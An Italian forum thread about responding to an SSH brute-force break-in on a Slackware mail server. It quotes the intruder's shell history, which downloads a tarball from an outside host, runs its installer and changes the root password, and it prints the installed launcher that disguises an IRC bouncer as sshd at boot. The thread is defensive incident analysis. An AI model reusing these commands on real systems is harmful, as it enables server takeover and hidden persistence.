Problemi con password di root...............

[stefanoxjx]

Ciao a tutti, ho una slackware 9.1 che non mi riconosce più la password di root.
Siccome questa macchina fa da server di posta, credo che qualcuno sia riuscito ad entrare nel sistema (da internet) e cambiarla.
E' ancora valida la procedura spiegata su "appunti di informatica libera" per recuperare un sistema del quale ci si è dimenticati la password????
Altrimenti esistono altri sistemi?

Grazie.

[PiloZ]

http://www.etechs.it/howto/HA/lost-r...ssword.php.php

con un cd di knoppix penso risolveresti tutto

[HexDEF6]

Quote:

Originariamente inviato da stefanoxjx

Ciao a tutti, ho una slackware 9.1 che non mi riconosce più la password di root.
Siccome questa macchina fa da server di posta, credo che qualcuno sia riuscito ad entrare nel sistema (da internet) e cambiarla.
E' ancora valida la procedura spiegata su "appunti di informatica libera" per recuperare un sistema del quale ci si è dimenticati la password????
Altrimenti esistono altri sistemi?

Grazie.

bootando da una distro live e facendo un chroot non c'e' problema per cambiare password.... ma se ti hanno veramente rottkittizzato la macchina l'unica soluzione e' la piallatura totale (dopo aver capito da che parte sono entrati)...

Ciao!

[stefanoxjx]

Quote:

Originariamente inviato da HexDEF6

bootando da una distro live e facendo un chroot non c'e' problema per cambiare password.... ma se ti hanno veramente rottkittizzato la macchina l'unica soluzione e' la piallatura totale (dopo aver capito da che parte sono entrati)...

Ciao!

Oggi mi ha chiamato il cliente dicendomi che un utente non riesce più a scaricare la posta perchè gli chiede la password.
Mi sono collegato tramite ssh con il mio nome utente, però quando ho digitato su e la password mi sono accorto che non mi accetta più nemmeno la password di root.
A questo punto, sono arrivato alla conclusione che qualcuno abbia messo mano dall'esterno, ma l'unica porta che ho lasciato aperta è la ssh, quindi credo sia entrato da li.
Domani mattina vado dal cliente e spero di riuscire a capire dai log cos'è successo.
Altrimenti.............. pialla alla mano

[bort_83]

Quote:

Originariamente inviato da stefanoxjx

Oggi mi ha chiamato il cliente dicendomi che un utente non riesce più a scaricare la posta perchè gli chiede la password.
Mi sono collegato tramite ssh con il mio nome utente, però quando ho digitato su e la password mi sono accorto che non mi accetta più nemmeno la password di root.
A questo punto, sono arrivato alla conclusione che qualcuno abbia messo mano dall'esterno, ma l'unica porta che ho lasciato aperta è la ssh, quindi credo sia entrato da li.
Domani mattina vado dal cliente e spero di riuscire a capire dai log cos'è successo.
Altrimenti.............. pialla alla mano

probabilmente nn puoi fare su da ssh...

[stefanoxjx]

Quote:

Originariamente inviato da bort_83

probabilmente nn puoi fare su da ssh...

L'ho sempre fatto
Comunque per togliere ogni dubbio, ho già fatto provare al cliente a loggarsi come root direttamente dalla tastiera del server, ma non accede lo stesso ed escludo che possa essere un problema di disco o altro, perchè tutti gli altri utenti (circa una ventina) e tutte le funzioni del server continuano ad andare senza problemi.
Mi puzza il fatto che sia saltata solo la password di root e quella di posta di un altro utente
Se veramente il server ha subito un'intrusione e quello che ha effettuato l'attacco è uno con le p@lle, sicuramente avrà manomesso anche i file di log per nasconedere le tracce.
Domani mattina vediamo

[stefanoxjx]

Eccolo, su .bash_history ho trovato questo (che sicuramente non è roba mia):

passwd
cd /var/tmp
wget http://www.psychoid.net/psyBNC2.3.1.tar.gz
tar zxvf psyBNC2.3.1.tar.gz
cd psybnc
make
./psybnc
pico psybnc.conf
make
./psybnc
pico psybnc.conf
cd /usr/include
wget dragonu.biz/db.tgz
tar xzvf db.tgz
rm -rf db.tgz
cd db
./inst
ls -l
passwd root
reboot

[HexDEF6]

adesso l'importante e' capire come sono entrati (per evitare che si verifichi nuovamente)... e poi pialli la macchina

[stefanoxjx]

Hai idea di cosa possa essere questo psyBNC???
Ho guardato nel sito, ma da quello che ho capito, sembrerebbe una patch.

Quote:

adesso l'importante e' capire come sono entrati (per evitare che si verifichi nuovamente)... e poi pialli la macchina

Sto spulciando i log, credo siano riusciti ad entrare tramite ssh, infatto ho trovato questo (che è solo una parte di tutto il log):

Apr 15 15:43:34 dal-santo sshd[4191]: Failed password for illegal user billy from 66.120.42.38 port 35899 ssh2
Apr 15 15:43:36 dal-santo sshd[4193]: Illegal user yoyo from 66.120.42.38
Apr 15 15:43:36 dal-santo sshd[4193]: Failed password for illegal user yoyo from 66.120.42.38 port 35947 ssh2
Apr 15 15:43:39 dal-santo sshd[4195]: Illegal user victor from 66.120.42.38
Apr 15 15:43:39 dal-santo sshd[4195]: Failed password for illegal user victor from 66.120.42.38 port 35997 ssh2
Apr 15 15:43:41 dal-santo sshd[4197]: Illegal user fbi from 66.120.42.38
Apr 15 15:43:41 dal-santo sshd[4197]: Failed password for illegal user fbi from 66.120.42.38 port 36045 ssh2
Apr 15 15:43:44 dal-santo sshd[4199]: Illegal user mark from 66.120.42.38
Apr 15 15:43:44 dal-santo sshd[4199]: Failed password for illegal user mark from 66.120.42.38 port 36095 ssh2
Apr 15 15:43:46 dal-santo sshd[4201]: Illegal user william from 66.120.42.38
Apr 15 15:43:46 dal-santo sshd[4201]: Failed password for illegal user william from 66.120.42.38 port 36149 ssh2
Apr 15 15:43:49 dal-santo sshd[4203]: Illegal user patrick from 66.120.42.38
Apr 15 15:43:49 dal-santo sshd[4203]: Failed password for illegal user patrick from 66.120.42.38 port 36196 ssh2
Apr 15 15:43:51 dal-santo sshd[4205]: Illegal user shin from 66.120.42.38
Apr 15 15:43:51 dal-santo sshd[4205]: Failed password for illegal user shin from 66.120.42.38 port 36247 ssh2
Apr 15 15:43:54 dal-santo sshd[4207]: Illegal user veronica from 66.120.42.38
Apr 15 15:43:54 dal-santo sshd[4207]: Failed password for illegal user veronica from 66.120.42.38 port 36292 ssh2
Apr 15 15:43:56 dal-santo sshd[4209]: Illegal user justin from 66.120.42.38
Apr 15 15:43:56 dal-santo sshd[4209]: Failed password for illegal user justin from 66.120.42.38 port 36340 ssh2
Apr 15 15:43:59 dal-santo sshd[4211]: Illegal user ana from 66.120.42.38
Apr 15 15:43:59 dal-santo sshd[4211]: Failed password for illegal user ana from 66.120.42.38 port 36393 ssh2
Apr 15 15:44:01 dal-santo sshd[4213]: Illegal user daniel from 66.120.42.38
Apr 15 15:44:01 dal-santo sshd[4213]: Failed password for illegal user daniel from 66.120.42.38 port 36442 ssh2
Apr 15 15:44:03 dal-santo sshd[4277]: Illegal user alex from 66.120.42.38
Apr 15 15:44:03 dal-santo sshd[4277]: Failed password for illegal user alex from 66.120.42.38 port 36498 ssh2
Apr 15 15:44:06 dal-santo sshd[4279]: Failed password for laser from 66.120.42.38 port 36548 ssh2
Apr 15 15:44:08 dal-santo sshd[4281]: Illegal user tcp from 66.120.42.38
Apr 15 15:44:08 dal-santo sshd[4281]: Failed password for illegal user tcp from 66.120.42.38 port 36599 ssh2
Apr 15 15:44:11 dal-santo sshd[4283]: Illegal user andrea from 66.120.42.38
Apr 15 15:44:11 dal-santo sshd[4283]: Failed password for illegal user andrea from 66.120.42.38 port 36645 ssh2
Apr 15 15:44:13 dal-santo sshd[4285]: Illegal user bob from 66.120.42.38
Apr 15 15:44:13 dal-santo sshd[4285]: Failed password for illegal user bob from 66.120.42.38 port 36693 ssh2
Apr 15 15:44:16 dal-santo sshd[4287]: Illegal user gai from 66.120.42.38
Apr 15 15:44:16 dal-santo sshd[4287]: Failed password for illegal user gai from 66.120.42.38 port 36742 ssh2
Apr 15 15:44:18 dal-santo sshd[4289]: Illegal user gay from 66.120.42.38
Apr 15 15:44:18 dal-santo sshd[4289]: Failed password for illegal user gay from 66.120.42.38 port 36793 ssh2
Apr 15 15:44:21 dal-santo sshd[4291]: Failed password for rpc from 66.120.42.38 port 36844 ssh2
Apr 15 15:44:23 dal-santo sshd[4293]: Illegal user george from 66.120.42.38
Apr 15 15:44:23 dal-santo sshd[4293]: Failed password for illegal user george from 66.120.42.38 port 36890 ssh2
Apr 15 15:44:26 dal-santo sshd[4295]: Illegal user smile from 66.120.42.38
Apr 15 15:44:26 dal-santo sshd[4295]: Failed password for illegal user smile from 66.120.42.38 port 36935 ssh2
Apr 15 15:44:28 dal-santo sshd[4297]: Illegal user smith from 66.120.42.38
Apr 15 15:44:28 dal-santo sshd[4297]: Failed password for illegal user smith from 66.120.42.38 port 36977 ssh2
Apr 15 15:44:30 dal-santo sshd[4299]: Illegal user christopher from 66.120.42.38
Apr 15 15:44:30 dal-santo sshd[4299]: Failed password for illegal user christopher from 66.120.42.38 port 37020 ssh2
Apr 15 15:44:33 dal-santo sshd[4301]: Illegal user robert from 66.120.42.38
Apr 15 15:44:33 dal-santo sshd[4301]: Failed password for illegal user robert from 66.120.42.38 port 37066 ssh2
Apr 15 15:44:35 dal-santo sshd[4303]: Illegal user coolboy from 66.120.42.38
Apr 15 15:44:35 dal-santo sshd[4303]: Failed password for illegal user coolboy from 66.120.42.38 port 37110 ssh2
Apr 15 15:44:37 dal-santo sshd[4305]: Illegal user derek from 66.120.42.38
Apr 15 15:44:37 dal-santo sshd[4305]: Failed password for illegal user derek from 66.120.42.38 port 37154 ssh2
Apr 15 15:44:40 dal-santo sshd[4307]: Illegal user james from 66.120.42.38
Apr 15 15:44:40 dal-santo sshd[4307]: Failed password for illegal user james from 66.120.42.38 port 37199 ssh2
Apr 15 15:44:42 dal-santo sshd[4309]: Illegal user james from 66.120.42.38
Apr 15 15:44:42 dal-santo sshd[4309]: Failed password for illegal user james from 66.120.42.38 port 37245 ssh2
Apr 15 15:44:44 dal-santo sshd[4311]: Illegal user james from 66.120.42.38
Apr 15 15:44:44 dal-santo sshd[4311]: Failed password for illegal user james from 66.120.42.38 port 37290 ssh2
Apr 15 15:44:47 dal-santo sshd[4313]: Illegal user lisa from 66.120.42.38
Apr 15 15:44:47 dal-santo sshd[4313]: Failed password for illegal user lisa from 66.120.42.38 port 37337 ssh2
Apr 15 15:44:49 dal-santo sshd[4315]: Illegal user mario from 66.120.42.38
Apr 15 15:44:49 dal-santo sshd[4315]: Failed password for illegal user mario from 66.120.42.38 port 37378 ssh2
Apr 15 15:44:51 dal-santo sshd[4317]: Illegal user martin from 66.120.42.38
Apr 15 15:44:51 dal-santo sshd[4317]: Failed password for illegal user martin from 66.120.42.38 port 37423 ssh2
Apr 15 15:44:53 dal-santo sshd[4319]: Illegal user sonya from 66.120.42.38
Apr 15 15:44:53 dal-santo sshd[4319]: Failed password for illegal user sonya from 66.120.42.38 port 37467 ssh2
Apr 15 15:44:56 dal-santo sshd[4321]: Illegal user tony from 66.120.42.38
Apr 15 15:44:56 dal-santo sshd[4321]: Failed password for illegal user tony from 66.120.42.38 port 37506 ssh2
Apr 15 15:44:58 dal-santo sshd[4323]: Illegal user just from 66.120.42.38
Apr 15 15:44:58 dal-santo sshd[4323]: Failed password for illegal user just from 66.120.42.38 port 37546 ssh2
Apr 15 15:45:00 dal-santo sshd[4325]: Illegal user justice from 66.120.42.38
Apr 15 15:45:00 dal-santo sshd[4325]: Failed password for illegal user justice from 66.120.42.38 port 37588 ssh2
Apr 15 15:45:03 dal-santo sshd[4327]: Illegal user bank from 66.120.42.38
Apr 15 15:45:03 dal-santo sshd[4327]: Failed password for illegal user bank from 66.120.42.38 port 37626 ssh2
Apr 15 15:45:05 dal-santo sshd[4394]: Illegal user vip from 66.120.42.38
Apr 15 15:45:05 dal-santo sshd[4394]: Failed password for illegal user vip from 66.120.42.38 port 37667 ssh2
Apr 15 15:45:47 dal-santo sshd[4396]: Accepted password for info from 24.166.80.223 port 62766 ssh2
Apr 15 16:01:50 dal-santo sshd[5717]: Accepted password for root from 216.23.33.126 port 63895 ssh2
Apr 15 16:21:18 dal-santo sshd[7051]: Accepted password for root from 24.166.80.223 port 63015 ssh2

E infatti le password che non funzionavano più erano quelle dell'utente info e quelle dell'utente root

[HexDEF6]

Quote:

Originariamente inviato da stefanoxjx

Hai idea di cosa possa essere questo psyBNC???
Ho guardato nel sito, ma da quello che ho capito, sembrerebbe una patch.

http://www.psychoid.net/

Quote:

Originariamente inviato da stefanoxjx

Sto spulciando i log, credo siano riusciti ad entrare tramite ssh, infatto ho trovato questo (che è solo una parte di tutto il log):

Apr 15 15:43:34 dal-santo sshd[4191]: Failed password for illegal user billy from 66.120.42.38 port 35899 ssh2
<--CUT-->
Apr 15 15:45:47 dal-santo sshd[4396]: Accepted password for info from 24.166.80.223 port 62766 ssh2
Apr 15 16:01:50 dal-santo sshd[5717]: Accepted password for root from 216.23.33.126 port 63895 ssh2
Apr 15 16:21:18 dal-santo sshd[7051]: Accepted password for root from 24.166.80.223 port 63015 ssh2

E infatti le password che non funzionavano più erano quelle dell'utente info e quelle dell'utente root

allora ti serve una tripla tirata di orecchie!
1) non mettere il login da root direttamente!
2) hai usato password deboli!

qui ho messo giu una guida (ancora in fase di lavorazione) su ssh:
http://forum.hwupgrade.it/showthread.php?t=920471

Ciao!

[e-Tip]

brute force via ssh...?
comunque, come ti hanno gia detto, non permettere l'accesso diretto di root da ssh..
[OT] mmm questo è un genio... cambia la password di root ovvio che il primo admin che entra se ne accorge[/OT]

tra l'altro...
inetnum: 66.120.42.0 - 66.120.42.255
netname: SBCIS-10153-11146
descr: MacDonald Computer Systems
country: US

[stefanoxjx]

Quote:

Originariamente inviato da HexDEF6

http://www.psychoid.net/
allora ti serve una tripla tirata di orecchie!
1) non mettere il login da root direttamente!
2) hai usato password deboli!

qui ho messo giu una guida (ancora in fase di lavorazione) su ssh:
http://forum.hwupgrade.it/showthread.php?t=920471

Ciao!

Accetto volentieri la tripla tirata di orecchie ma solo per il punto uno che ho già provveduto a correggere.
Per il punto 2, posso stare tranquillo, perchè come dici tu, effettivamente era stata messa una password debole, ma non da me, direttamente dal cliente che cercando di cambiare la password di un utente ha erroneamente cambiato quella di root con una da 5 caratteri

Ho trovato su /var/tmp i file scompattati di psyBNC, però non lo vedo nella lista dei processi e nemmeno negli script di avvio.............. credo sia un buon segno!!!!!!

[HexDEF6]

Quote:

Originariamente inviato da stefanoxjx

Accetto volentieri la tripla tirata di orecchie ma solo per il punto uno che ho già provveduto a correggere.
Per il punto 2, posso stare tranquillo, perchè come dici tu, effettivamente era stata messa una password debole, ma non da me, direttamente dal cliente che cercando di cambiare la password di un utente ha erroneamente cambiato quella di root con una da 5 caratteri

Quote:

Originariamente inviato da stefanoxjx

Ho trovato su /var/tmp i file scompattati di psyBNC, però non lo vedo nella lista dei processi e nemmeno negli script di avvio.............. credo sia un buon segno!!!!!!

io non ne sarei tanto sicuro!
prova con chkrootkit e vedi se ti hanno modificato ps top ecc.
prova a vedere i processi con pstree (che ogni tanto si scordano di rootkittizzarlo!) e vedi se trovi qualche processo in piu' che con ps

Ciao!

[RaouL_BennetH]

aggiungerei anche, oltre a chkrootkit, rkhunter che trovi qui:

http://downloads.rootkit.nl/rkhunter-1.1.5.tar.gz

[Maestro]

A parte il reboot e il cambio di password di root e l'installazione di un bouncer per IRC (psyBNC) fatto da chi bruteforcato e' stato scaricato e installato probabilmente un rootkit:

Codice:

cd /usr/include
wget dragonu.biz/db.tgz
tar xzvf db.tgz
rm -rf db.tgz 
./inst

Per tua fortuna non e' stato molto furbo di cancellare i comandi digitati e ha cambiato la password di root.

Ho scaricato quel file e non sembra un vero e proprio rootkit. Il file inst copia end, che contiene:

Codice:

cd /usr/include/news/db
export PATH="."
sshd

per lanciare lo psybnc (il falso sshd) come se fosse apparentemente il demone ssh. Inoltre aggiunge il comando in rc.sysinit (che non so se esiste su Slackware)

Penso che sia sufficiente cancellare end sia in /usr/bin che in /usr/sbin, pulire rc.sysinit e cancellare /usr/include/news/db e /usr/include/db, db.tgz e gli altri eventuali file se non e' stato fatto altro. (leggi installato un rootkit)


Ciao

[stefanoxjx]

Qualcosa sta saltando fuori.
rkhunter mi trova:

/usr/bin/file [ BAD ]
e

- GnuPG 1.2.3 [ Vulnerable ]
- Apache 1.3.28 [ Vulnerable ]
- Bind DNS [unknown] [ OK ]
- OpenSSL 0.9.7b [ Vulnerable ]
- PHP 4.3.3 [ Vulnerable ]

Che fo, cancello anche /usr/bin/file?

[HexDEF6]

Quote:

Originariamente inviato da stefanoxjx

Qualcosa sta saltando fuori.
rkhunter mi trova:

/usr/bin/file [ BAD ]
e

- GnuPG 1.2.3 [ Vulnerable ]
- Apache 1.3.28 [ Vulnerable ]
- Bind DNS [unknown] [ OK ]
- OpenSSL 0.9.7b [ Vulnerable ]
- PHP 4.3.3 [ Vulnerable ]

Che fo, cancello anche /usr/bin/file?

non vorrei essere un pessimista... ma dopo che qualcuno mi prende la password da root, l'unica soluzione che vedo e' piallare la macchina... non puoi sapere se le cose fatte nella hystory della bash sono le UNICHE bastardate che ti hanno fatto... quindi...

[stefanoxjx]

Quote:

Originariamente inviato da HexDEF6

non vorrei essere un pessimista... ma dopo che qualcuno mi prende la password da root, l'unica soluzione che vedo e' piallare la macchina... non puoi sapere se le cose fatte nella hystory della bash sono le UNICHE bastardate che ti hanno fatto... quindi...

Sto solo cercando di temporeggiare qualche giorno.
A breve (qualche giorno) dovrebbe arrivare l'adsl dal cliente e siamo già d'accordo che appena sarà disponibile installeremo un nuovo server con antivirus e antispam..........e password più forti

[RaouL_BennetH]

Mi scuserete se approfitto di questo 3d, ma non vorrei aprirne un altro visto che l'argomento è quasi lo stesso. Tempo fa, ad un mio conoscente successe la stessa cosa, sempre tramite via ssh ma perchè aveva come passwd di root, semplicemente 'pippo' e l'accesso in remoto come root tramite ssh era consentito....nzomma, nemmeno con win.... Cmq, fatto sta che fu costretto a rifare tutto da zero. Ora, volevo chiedervi, ma sarebbe possibile impostare una password specifica per ciascuna dir 'vitale' ?

Mi spiego meglio, diciamo che se devo accedere a /usr/bin per copiarci qualcosa, anche se sono root, mi chieda un'ulteriore passwd?